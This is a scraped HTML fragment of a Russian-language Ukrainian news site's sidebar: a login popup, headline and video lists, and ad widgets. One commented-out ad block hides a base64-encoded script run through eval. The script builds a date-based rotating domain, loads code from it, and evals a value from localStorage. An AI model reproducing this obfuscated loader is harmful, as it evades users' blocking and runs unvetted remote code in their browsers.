href="https://enovosty.com/wp-content/plugins/ajax-login/login.css?v=2" /><div id="popup-login"><div class="login"><div class="caption"><span class="title">Вход на сайт</span><a class="link-close" href="#"><span class="close">Закрыть</span></a></div><form name="loginform" id="loginform" action="#" method="post"><p class="error"></p><p class="message"></p><img id="al_loadingImage" alt="Загрузка..." src="https://enovosty.com/wp-content/plugins/ajax-login/al_loading.gif"/><p><label for="user_login">Логин (email):</label><input type="text" name="user_login" id="user_login" class="input" value="" size="20" /></p><p><label for="user_pass">Пароль:</label><input type="password" name="pwd" id="user_pass" class="input" value="" size="20" /></p><div class="login-footer"><p class="forgetmenot"><input name="rememberme" type="checkbox" id="rememberme" value="forever" /><label for="rememberme">Запомнить меня</label></p><p class="submit"><input type="button" onClick="sendLogin('https://enovosty.com/wp-content/plugins/ajax-login/login.php', jQuery('#loginform').serialize());return false;" name="wp-submit" id="wp-submit" value="Войти" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="/register" id="wp-register">Зарегистрироваться</a></p></div><fieldset><legend>или</legend><div class="soclogin"> </div></fieldset></form></div></div><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/ajax-login/ajaxlogin.js"></script><input style="width: auto;float: none;background: #2196F3;margin: 5px 0;padding: 0 10px;font-size: 12px;" type="button" value="Вход/Регистрация" id="addanons" name="wp-submit" onclick="get_auth()" ><style type="text/css" media="screen">@import url(/wp-content/plugins/ajax-comment-loading/css/style.css?v=8);</style><noscript>Для загрузки комментариев нужен JavaScript.</noscript><div id="comments-loading" style="display:none">Комментарии...</div><div id="comments-loaded"></div><input type="hidden" name="comments_nonce" value="d616170e62" id="comments_nonce" /><script type="text/javascript">document.getElementById('comments-loading').style.display = 'block';</script></div>  </div><br /><div id='div-gpt-ad-1531223757969-0' style='height:600px; width:300px;'><script>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1531223757969-0'); });</script></div><br><br /> <div class="mainPageWiget articles" style="overflow:visible;"><p style="height: auto;overflow: visible; font-weight: 700;font-family: arial,verdana,tahoma;margin: 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/en_analitics.jpg" style="margin-right: 5px;margin-bottom: -2px;"><a style="color:#000;font-size: 16px;" href="https://enovosty.com/articles">Аналитика</a></p><hr style="border: 1px solid #000000;"><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4834251"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/politika/full/3101-itogi-yanvarya-istoricheskij-shans-dlya-evropy-donbasskij-syur-i-bronevik-navalnogo">Итоги января: Исторический шанс для Европы, Донбасский сюр и броневик Навального</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4834172"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/politika/full/3001-ukroboronprom-taki-gotovyat-k-deribanu">"Реформа" Укроборонпрома: кому выгодно уничтожение оборонно-промышленного комплекса Украины</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4834007"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/ekonomika/full/2801-yuzhmash-vzletit-ili-upadet">Южмаш: взлетит или упадет ведущее ракетно-космическое предприятие Украины?</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4833775"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/auto/full/2701-kolesom-po-bezdorozhyu-luchshie-krossovery-i-vnedorozhniki-na-vse-sluchai-zhizni">Колесом по бездорожью: Лучшие кроссоверы и внедорожники на все случаи жизни</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4833327"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/politika/full/2501-preemnik-merkel-moskva-stanet-eshhe-blizhe-k-germanii">Преемник Меркель: Москва станет еще ближе к Германии?</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4833065"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/markets/full/2201-tarifnyj-bespredel-pochemu-ukraincy-vse-ravno-zaplatyat-bolshe-za-kommunalnye-uslugi">Конкурентные войны и тарифы на газ: почему украинцы все равно заплатят больше за коммунальные услуги</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4832298"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/politika/full/1601-demokraty-i-respublikancy-scepilis-v-smertelnoj-sxvatke-za-vlast-v-ssha-zheleznaya-pyata-pobeditelej">Демократы и республиканцы сцепились в смертельной схватке за власть в США: «Железная Пята» победителей</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4831384"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/politika/full/801-novosti-kremlya-putin-opyat-ne-uxodit">Новости Кремля: Путин опять (не) уходит...</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4830223"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/ekonomika/full/2812-konvulsii-antonova-vyjdet-li-iz-zatyazhnogo-pike-znamenityj-aviaproizvoditel">Конвульсии "Антонова": Выйдет ли из затяжного пике знаменитый авиапроизводитель?</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4829953"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/politika/full/2612-prognozy-politiko-ekonomicheskoj-zhizni-v-ukraine-na-2021-god-ocenki-ekspertov">Прогноз политико-экономической ситуации в Украине на 2021 год - оценки экспертов</a></div><div class="more"><a href="https://enovosty.com/articles">Все статьи</a></div></div></div><br /><script async src="//whhrux.com/8ny1l7192ivl0mp/y03h8q768vuq/678ypkeqn6.php"></script><div data-la-block="dc72cd02-a35e-4362-9683-673dfde66e41"></div><br><script async src="//whhrux.com/50c7l1912vli/m0p30yh8q768vuq786pkybrgz6.php"></script><div data-la-block="fc0a9a9b-1dbe-46f7-b141-804f98afe650"></div><br /><div id="zaw-ocifiqifodilibonedana"><script>!(function(w,m){(w[m]||(w[m]=[]))&&w[m].push(
{id:'zaw-ocifiqifodilibonedana',block:'119650', site_id:'20752'});})(window, 'mtzBlocks');</script></div><br /> <div id="pop_video" class="six"><p class="head"><span>популярные видео</span></p><div class="caption" data-limit="6"> <div class="caption_link"><a href="javascript:void(0)" class="active" onclick="getbVideo(0)">читаемые</a>&nbsp;&nbsp;<a href="javascript:void(0)" data-rb="1" onclick="getbVideo(1)">комментируемые</a></div><div class="popular-sort"><div class="sort"><a onclick="getPopVideo(31)">месяц</a></div><div class="sort"><a class="active" onclick="getPopVideo(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">за&#160;&#160;<a onclick="getPopVideo(1)">сутки</a>&nbsp;&nbsp;|</div></div></div> <table style="width:100%;" class="newsbody"><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_politics/full/3001-kurjoz-v-seti-poyavilsya-muzykalnyj-klip-parodiya-na-zelenskogo-v-stile-95-kvartala"><img width="142" height="88" alt="В Сети появился музыкальный клип-пародия на Зеленского в стиле 95 квартала" src="https://enovosty.com/wp-content/uploads/2021/01/3-3.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_politics/full/3001-kurjoz-v-seti-poyavilsya-muzykalnyj-klip-parodiya-na-zelenskogo-v-stile-95-kvartala">В Сети появился музыкальный клип-пародия на Зеленского в стиле 95 квартала</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_kiev/full/2901-v-stolice-okolo-desyati-avto-popali-v-sereznoe-dtp-video"><img width="142" height="88" alt="В столице произошло массовое ДТП" src="https://enovosty.com/wp-content/uploads/2021/01/2021-01-29.png" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_kiev/full/2901-v-stolice-okolo-desyati-avto-popali-v-sereznoe-dtp-video">В столице произошло массовое ДТП</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news_abroad/full/3101-v-rumynii-pojmali-medvedya-kotoryj-gonyalsya-za-lyzhnikami-video"><img width="142" height="88" alt="В Румынии поймали медведя, который терроризировал лыжников на склонах" src="https://enovosty.com/wp-content/uploads/2021/01/screenshot_50-e1612086384830.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/3101-v-rumynii-pojmali-medvedya-kotoryj-gonyalsya-za-lyzhnikami-video">В Румынии поймали медведя, который терроризировал лыжников на склонах</a></div></td></tr><tr><td class="view"><span><i></i>21120</span></td><td class="view"><span><i></i>5581</span></td><td class="view last"><span><i></i>1259</span></td></tr><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_society/full/202-polzovatelej-seti-pokorila-ogromnaya-panda-kotoraya-igraet-v-snegu-video"><img width="142" height="88" alt="Пользователей Сети покорила огромная панда, которая играет в снегу" src="https://enovosty.com/wp-content/uploads/2021/02/screenshot_3-e1612260442249.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_society/full/202-polzovatelej-seti-pokorila-ogromnaya-panda-kotoraya-igraet-v-snegu-video">Пользователей Сети покорила огромная панда, которая играет в снегу</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news-culture/full/302-xudozhnik-tri-goda-sverlil-46-tysyach-dyrochek-v-yajce-radi-mirovogo-rekorda-rezultat-zavorazhivaet-foto-video"><img width="142" height="88" alt="Художник три года сверлил 46 тысяч дырочек в яйце ради мирового рекорда. Результат завораживает" src="https://enovosty.com/wp-content/uploads/2021/02/most-drilled-egg-shell-sculpture2-e1612345583599.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news-culture/full/302-xudozhnik-tri-goda-sverlil-46-tysyach-dyrochek-v-yajce-radi-mirovogo-rekorda-rezultat-zavorazhivaet-foto-video">Художник три года сверлил 46 тысяч дырочек в яйце ради мирового рекорда. Результат завораживает</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news_abroad/full/202-putina-v-otstavku-v-rossii-nachalis-protesty-i-zaderzhaniya-posle-prigovora-navalnomu-video"><img width="142" height="88" alt="Путина - в отставку!: в России начались протесты и жесткие задержания после приговора Навальному" src="https://enovosty.com/wp-content/uploads/2021/02/p-khintaajmtewxq9ubhvw.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/202-putina-v-otstavku-v-rossii-nachalis-protesty-i-zaderzhaniya-posle-prigovora-navalnomu-video">Путина - в отставку!: в России начались протесты и жесткие задержания после приговора Навальному</a></div></td></tr><tr><td class="view"><span><i></i>1255</span></td><td class="view"><span><i></i>1141</span></td><td class="view last"><span><i></i>920</span></td></tr></table><div class="more"><a href="https://enovosty.com/video">Все Видео</a></div></div><br> <div class="wiget text_chit"><p style="margin:0; padding-left:10px; font-size: 12px;">Читайте также</p><table cellpadding="0" cellspacing="0" border="0" class="table_chit"><tr><td> <a class="postTitle" href="https://enovosty.com/news_society/full/2501-v-nacbanke-nazvali-naibolee-rasprostranennye-banknoty-i-monety" rel="bookmark">В Нацбанке назвали наиболее распространенные банкноты и монеты</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_economy/full/1101-nacbank-rasskazal-kakie-bumazhnye-dengi-ischeznut-v-etom-godu" rel="bookmark">Нацбанк рассказал, какие бумажные деньги исчезнут в этом году</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_economy/full/2812-v-nbu-rasskazali-o-kreditirovanii-v-ukraine-v-2020-godu" rel="bookmark">В НБУ рассказали о кредитировании в Украине в 2020 году</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_economy/full/2212-nbu-vvel-antikrizisnye-mery-dlya-bankov-na-period-lokdauna" rel="bookmark">НБУ ввел антикризисные меры для банков на период локдауна</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news-finance/full/1112-stalo-izvestno-skolko-v-etom-godu-ukraincy-potratili-za-rubezhom" rel="bookmark">Стало известно, сколько в этом году украинцы потратили за рубежом</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_economy/full/912-gryadut-masshtabnye-proverki-v-nbu-rasskazali-kogo-v-ukraine-zhdut-peremeny" rel="bookmark">Грядут масштабные проверки. В НБУ рассказали, кого в Украине ждут перемены</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news-finance/full/2511-danilishin-rasskazal-kak-na-ukrainu-vliyaet-zaderzhka-kreditov-mvf" rel="bookmark">Данилишин рассказал, как на Украину влияет задержка кредитов МВФ</a><br /></td> </tr></table></div><div class="bannerB"><div id="phoenix57c02c9d4f32fe394547dcf1"></div><script>var site_id = "57768bd94f32fe17ccf62bcc";var widget_id = "57c02c9d4f32fe394547dcf1";</script><script src="//phoenix-widget.com/static/js/jsonp.js"></script></div><!--<div id="MIXADV_6543" class="MIXADVERT_NET"></div><script>var node6543 = document.getElementById("MIXADV_6543");if( node6543 )
{var script = document.createElement("script");script.charset = "utf-8";script.src = "https://m.mixadvert.com/show/?id=6543&r="+Math.random();
node6543.parentNode.appendChild(script);script.onerror = function(){window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDY1NDMgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNjU0My5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgc2NyaXB0X3NlY29uZCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9zZWNvbmQuc3JjID0gImh0dHBzOi8vIisgaG9zdCsiIjsgbm9kZTY1NDMucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChzY3JpcHRfc2Vjb25kKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTY1NDMuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjY1NDMiKSkgfSwgNTAwMCk7ICA7fTsg") );}}</script>
--><div class="wiget simple_pr" style="margin:0 0 10px;display:block; position:relative;" id="theme_posts"> <div class="caption "> <p>Новости экономики</p><div class="popular-sort"><div class="sort"><a id="theme_31" onClick="getThemePopPosts(31, '4249,30426', 4249, 15)">месяц</a></div><div class="sort"><a id="theme_7"style="text-decoration: underline;" onClick="getThemePopPosts(7, '4249,30426', 4249, 15)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="theme_1" onClick="getThemePopPosts(1, '4249,30426', 4249, 15)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <h3 class="press"><a href="https://enovosty.com/news_economy/full/2901-norvezhskij-pensionnyj-fond-prodal-vse-svoi-aktivy-svyazannye-s-neftyu-i-gazom">Норвежский пенсионный фонд продал все свои активы, связанные с нефтью и газом (2245)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/102-v-2021-godu-planiruetsya-postroit-1400-km-koncessionnyx-dorog-kto-za-eto-zaplatit">В 2021 году планируется построить 1400 км концессионных дорог. Кто за это заплатит? (1362)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/302-glava-naftogaza-kobolev-chetyre-goda-poluchaet-premii-ne-vypolnyaya-kpi-ekspert">Глава «Нафтогаза» Коболев четыре года получает премии, не выполняя KPI - эксперт (1353)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/3101-ukraincam-sobirayutsya-izmenit-pensionnyj-vozrast-v-kabmine-rasskazali-ob-usloviyax">Украинцам собираются изменить пенсионный возраст: в Кабмине рассказали об условиях (1163)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/102-ukraincam-cherez-mesyac-pereschitayut-pensii-komu-dobavyat-tysyachu">Украинцам через месяц пересчитают пенсии. Кому добавят тысячу (1115)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/402-ekspert-ozvuchil-interesnyj-prognoz-po-sudbe-gazoprovod-severnogo-potoka-2">Эксперт озвучил интересный прогноз по судьбе газопровода "Северный поток-2" (1032)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/402-glava-pravleniya-cherkassyoblenergo-oleg-samchuk-vystupil-za-prekrashhenie-bankrotstva-predpriyatiya">Глава правления "Черкассыоблэнерго" Олег Самчук выступил за прекращение банкротства предприятия (692)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/3101-v-ukraine-ozhidayut-podorozhanie-produktov-na-chto-vyrastut-ceny-vesnoj">В Украине ожидают подорожание продуктов: на что вырастут цены весной (680)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/102-nazvana-oblast-v-kotoroj-komfortnee-vsego-vesti-biznes">Названа область, в которой комфортнее всего вести бизнес (643)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/202-komu-v-ukraine-povysyat-pensii-do-30-000-griven">Кому в Украине повысят пенсии до 30 000 гривен (616)</a></h3></div> </div><div class="mainarmiya"><p><a style="font-size: 17px;" href="https://enovosty.com/armiya">Армия</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4385247"><a href="https://enovosty.com/armiya/full/173-radiolokacionnaya-stanciya-3delrr-ssha" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/09/3DELRR-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/09/3DELRR-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/09/3DELRR-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/09/3DELRR.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/173-radiolokacionnaya-stanciya-3delrr-ssha" >Радиолокационная станция 3DELRR (США)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4399640"><a href="https://enovosty.com/armiya/full/526-boevaya-mashina-pehoty-vbci-franciya" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/10/vbci-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/10/vbci-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/10/vbci-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/10/vbci.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/526-boevaya-mashina-pehoty-vbci-franciya" >Боевая машина пехоты VBCI (Франция)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4405236"><a href="https://enovosty.com/armiya/full/872-avtomaticheskij-karabin-bofors-ak5-shveciya" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/11/ak5d_edit-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/11/ak5d_edit-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/11/ak5d_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/11/ak5d_edit.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/872-avtomaticheskij-karabin-bofors-ak5-shveciya" >Автоматический карабин BOFORS Аk5 (Швеция)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4503770"><a href="https://enovosty.com/armiya/full/748-boevoj-modul-iva" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2016/02/iva-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2016/02/iva-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2016/02/iva-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2016/02/iva.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/748-boevoj-modul-iva" >Боевой модуль «Ива»</a></div></td> </tr> </table> <a href="https://enovosty.com/armiya" class="allarmiya">Вся армия&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="mainperson"><p><a style="font-size: 17px;" href="https://enovosty.com/person">Персоны</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4303572"><a href="https://enovosty.com/person/full/kolomojskij-igor" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/07/kolomoiskiy_edit-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/07/kolomoiskiy_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/07/kolomoiskiy_edit.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/kolomojskij-igor" >Коломойский<br /> Игорь</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4308593"><a href="https://enovosty.com/person/full/kamenskih-nastya" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/08/kamenskih_edit-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/08/kamenskih_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/08/kamenskih_edit.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/kamenskih-nastya" >Каменских<br /> Настя</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4399354"><a href="https://enovosty.com/person/full/121-nazarenko-viktor" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2014/10/nazarenko_2_edit-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/10/nazarenko_2_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/10/nazarenko_2_edit.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/121-nazarenko-viktor" >Назаренко<br /> Виктор</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4696924"><a href="https://enovosty.com/person/full/106-buravel-dmitrij-sergeevich" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2018/06/2018-06-01-13.01.36_1-300x232.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2018/06/2018-06-01-13.01.36_1.jpg 300w, https://enovosty.com/wp-content/uploads/2018/06/2018-06-01-13.01.36_1-112x87.jpg 112w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/106-buravel-dmitrij-sergeevich" >Дмитро<br /> Сергійович<br /> Буравель</a></div></td> </tr> </table> <a href="https://enovosty.com/person" class="allperson">Все персоны&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="wiget simple_pr" id="pop_posts"> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" style="text-decoration: underline;" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/news_abroad/full/2401-ne-vse-koty-mogut-byt-odinakovo-fotogenichny-kureznye-foto">Курьез: Не все коты могут быть одинаково фотогеничны (ФОТО) (5536)</a></p><p class="press"><a href="https://enovosty.com/news-auto/full/402-nakazali-po-narodnomu-v-kieve-sverxzhestko-prouchili-geroya-parkovki-foto">Наказали по-народному: в Киеве проучили "героя парковки" (ФОТО) (4556)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/402-v-nebo-vpervye-podnyalsya-potencialno-samyj-tyazhelovooruzhennyj-istrebitel-v-mire-foto">В небо впервые поднялся самый тяжеловооруженный истребитель в мире (ФОТО) (4285)</a></p><p class="press"><a href="https://enovosty.com/news_incidents/full/302-kurez-dnya-zhurnalisty-atakuyut-ne-togo-tarasa-kozaka">Курьез дня: Журналисты атакуют не того Тараса Козака (3922)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/402-kak-vyglyadeli-realnye-passazhiry-i-komanda-titanika-i-kak-slozhilis-ix-sudby-posle-krusheniya-foto">Как выглядели реальные пассажиры и команда "Титаника" и как сложились их судьбы после крушения (ФОТО) (3892)</a></p><p class="press"><a href="https://enovosty.com/news-culture/full/402-rybak-nashel-zhemchuzhinu-stoimostyu-v-300-tysyach-dollarov">Рыбак нашел жемчужину стоимостью в 300 тысяч долларов (3523)</a></p><p class="press"><a href="https://enovosty.com/news-culture/full/402-v-ukrainu-idet-moshhnyj-ciklon-kotoryj-prineset-uxudshenie-pogody-sinoptik">В Украину идет мощный циклон, который принесет ухудшение погоды, - синоптик (2281)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/402-medicina-byla-eyo-prizvaniem-v-smi-pokazali-foto-26-letnej-devushki-pogibshej-v-pozhare-v-zaporozhe">"Медицина была её призванием": В СМИ показали фото 26-летней девушки, погибшей в пожаре в Запорожье (2078)</a></p><p class="press"><a href="https://enovosty.com/uk/news-auto-ukr/full/402-vodiyam-v-ukraini-pochali-prixoditi-lipovi-protokoli-pro-shtrafi">Водіям в Україні почали приходити липові протоколи про штрафи (1881)</a></p><p class="press"><a href="https://enovosty.com/news_politics/full/402-portnikov-nazval-tri-prichiny-pochemu-zelenskij-poshel-na-pryamoj-konflikt-s-medvedchukom">Портников назвал три причины, почему Зеленский пошел на прямой конфликт с Медведчуком (1676)</a></p></div> </div></div> </div><style>#sidebarRight{margin-top:-227px}</style><div id="sidebarRight" style="width:300px;" ><form method="get" id="searchform" action="https://enovosty.com/"><div class="search300"> <input type="text" value="" name="s" id="s" /> <input type="hidden" name="arh_title" value="on"> <input type="hidden" name="arh_text" value="on"> <input type="hidden" name="arh_news" value="on"> <input type="hidden" name="arh_posts" value="on"><input type="submit" id="searchsubmit" value="Поиск" /></div></form><div class="wiget simple_pr socnet"><div class="caption"><p>Последние новости в соцсетях</p></div> <table><tr><td><a href="https://www.facebook.com/enovosty/" rel="nofollow" target="_blank" class="facebook"><i></i></a></td><td><a href="https://twitter.com/enovosty" rel="nofollow" target="_blank" class="twitter"><i></i></a></td><td><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" rel="nofollow" target="_blank" 